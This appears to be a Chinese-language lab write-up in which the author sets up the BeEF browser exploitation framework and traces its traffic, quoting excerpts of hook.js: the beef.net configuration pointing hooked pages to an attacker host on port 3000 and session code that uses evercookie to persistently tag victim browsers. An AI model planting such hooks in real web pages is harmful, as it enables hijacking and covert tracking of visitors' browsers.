搭建完了beef就想简答的抓下包分析下

这是第一个包，追踪它

返回demo页面，并发现其中的脚本

window.location.protocol表示协议http， window.location.host代表主机加端口号，红线的意思是调用http://主机:3000/hook.js

继续跟踪数据流，发现浏览器get请求了hook.js

继续跟踪数据流

返回hook.js

这里是hook.js的代码

内容挺多的。。。看不懂

接着跟踪数据包，发现请求了提交了参数

到hook.js 里搜索dh，找到他的功能

/*!
* @literal object: beef.net
*
* Provides basic networking functions, 提供基础的网络功能
* like beef.net.request and beef.net.forgeRequest, 像beef.net.request和beef.net.forgetRequest
* used by BeEF command modules and the Requester extension, 被beef命令模块和扩展请求使用
* as well as beef.net.send which is used to return commands 返回命令
* to BeEF server-side components. beef的服务器端组件
*
* Also, it contains the core methods used by the XHR-polling
* mechanism (flush, queue)
*/
beef.net = {

host: "192.168.170.132",  
port: "3000",  
hook: "/hook.js",  
httpproto: "http",  
handler: '/dh',  
chop: 500,  
pad: 30, //this is the amount of padding for extra params such as pc, pid and sid  
sid\_count: 0,  
cmd\_queue: \[\],

继续跟踪，

在hook.js 里搜索BEEFHOOK

/*!
* @literal object: beef.session
*
* Provides basic session functions. 提供基础的session功能
*/
beef.session = {

hook\_session\_id\_length: 80,  
hook\_session\_id\_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",  
ec: new evercookie(),  
beefhook: "BEEFHOOK",

/\*\*  
 \* Gets a string which will be used to identify the hooked browser session  
 \*  
 \* @example: var hook\_session\_id = beef.session.get\_hook\_session\_id();  
 \*/  
  get\_hook\_session\_id: function() {  
    // check if the browser is already known to the framework  
    var id = this.ec.evercookie\_cookie(beef.session.beefhook);  
    if (typeof id == 'undefined') {  
        var id = this.ec.evercookie\_userdata(beef.session.beefhook);  
    }  
    if (typeof id == 'undefined') {  
        var id = this.ec.evercookie\_window(beef.session.beefhook);  
    }

    // if the browser is not known create a hook session id and set it  
    if ((typeof id == 'undefined') || (id == null)) {  
        id = this.gen\_hook\_session\_id();  
        this.set\_hook\_session\_id(id);  
    }

    // return the hooked browser session identifier  
    return id;  
},

之后的包就是在不断请求重复后两个

随便玩一个功能

效果：

查看数据包

在某次请求hook.js后发生变化

相应的包

可以看到我填写的攻击参数